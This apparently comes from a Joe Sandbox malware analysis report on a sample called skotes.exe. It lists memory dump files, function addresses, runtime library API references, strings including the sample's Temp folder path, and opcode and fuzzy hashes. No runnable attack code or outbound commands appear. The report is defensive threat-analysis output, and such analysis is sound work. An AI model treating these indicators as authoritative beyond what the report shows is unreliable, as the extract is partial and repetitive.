Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: 9e3afc23d0da236519f6c6c696b144d92073dd6ca2ff7a7b4005736c4c34bf8a
Instruction ID: 0373864f487f01c91a9eff5962fc253f8d7b118c438eaa4be429b8d8cc4a5ab4
Opcode Fuzzy Hash: 9e3afc23d0da236519f6c6c696b144d92073dd6ca2ff7a7b4005736c4c34bf8a
Instruction Fuzzy Hash: 2B31AF35710210AFCB05EF54C884BADB7A6AF8A700F140099E8069B392CF70AD51CF92

Function 002A86C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 002A86EE

Part of subcall function 0029EAD0: _SpinWait.LIBCONCRT ref: 0029EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 002A8702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 002A8734
List.LIBCMT ref: 002A87B7
List.LIBCMT ref: 002A87C6

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 61889e1df3d1fc269965666b2857d7ac8968383da4afee91eb356b10cbe2e2f9
Instruction ID: 608f68ff146f82bc5d1103f0ad0f248dbcaf11fe11cadb12f6ae0305b284b694
Opcode Fuzzy Hash: 61889e1df3d1fc269965666b2857d7ac8968383da4afee91eb356b10cbe2e2f9
Instruction Fuzzy Hash: 1E31553A921256DBCF14EFA4C9816ECF7B1BF06318F24006AD4016B652DF71AD24CB94

Function 002B182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 002B18A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 002B18EB

Strings

pContext, xrefs: 002B189C

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 370cc5b4342f85542a5d8714e6d95a6718c25450475cce0f50df8feb7dacf3e1
Instruction ID: e94aa3827c5c8301b9b4da321b3e70498bc59438e415408217302a72cf191524
Opcode Fuzzy Hash: 370cc5b4342f85542a5d8714e6d95a6718c25450475cce0f50df8feb7dacf3e1
Instruction Fuzzy Hash: 9F213831B306169BDB14AB68D8A5AFC73A9BF843B4B44012AE501872D1CFB4EC71CED0

Function 002BDFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

6+, xrefs: 002BE034
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 002BDFE8

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 6+$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-2955235780
Opcode ID: 8cc3b1834c8b46026d65f202fc0f814ee86b1af762d135bb124c5e4ce60c1bda
Instruction ID: 19a0faafa1a71a34763f0ff47b31d013a13dddfb99824ef53f47155eeb4b0af0
Opcode Fuzzy Hash: 8cc3b1834c8b46026d65f202fc0f814ee86b1af762d135bb124c5e4ce60c1bda
Instruction Fuzzy Hash: 3321A17162420A7FDF30BE758C80EEB77ADEF503E87114914F929A7151EBA0EC208B61

Function 002AAE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 002AAEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 002AAF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 002AAF4E

Strings

pExecutionResource, xrefs: 002AAF07

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 2215ef2b3dfa36006c3586ed7fcd449af3247f20284a69e69473bd58529f65ac
Instruction ID: e214eb942b3ef6ab40e4fdc0faf887b4594fa402211e840f4b0773e4b2d8fba5
Opcode Fuzzy Hash: 2215ef2b3dfa36006c3586ed7fcd449af3247f20284a69e69473bd58529f65ac
Instruction Fuzzy Hash: E221B671A603059BCF08FF64C882BADB7A5BF48310F104029E505AB382DBB0AE20DF95

Function 002A4EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 002A4F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 002A4F66

Strings

count, xrefs: 002A4EBA
ppVirtualProcessorRoots, xrefs: 002A4F1C

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: 743ad7d02f3b6abb3fafc149d5fac766af8cf2ef45a25735a3c03eb4894ebdef
Instruction ID: 19e2d47e49e19da874f9c58a43417d92f5695b5ee2822d62afa4163ec67de61c
Opcode Fuzzy Hash: 743ad7d02f3b6abb3fafc149d5fac766af8cf2ef45a25735a3c03eb4894ebdef
Instruction Fuzzy Hash: 1821AE35610115AFCF14EFA8C892EAD77A5BF89310F00406AE50697691CF71EE21CF91

Function 002AB975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 002ABA0E

Strings

RoInitialize, xrefs: 002AB998
RoUninitialize, xrefs: 002AB9C1
combase.dll, xrefs: 002AB983, 002AB988, 002AB99D, 002AB9C8

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
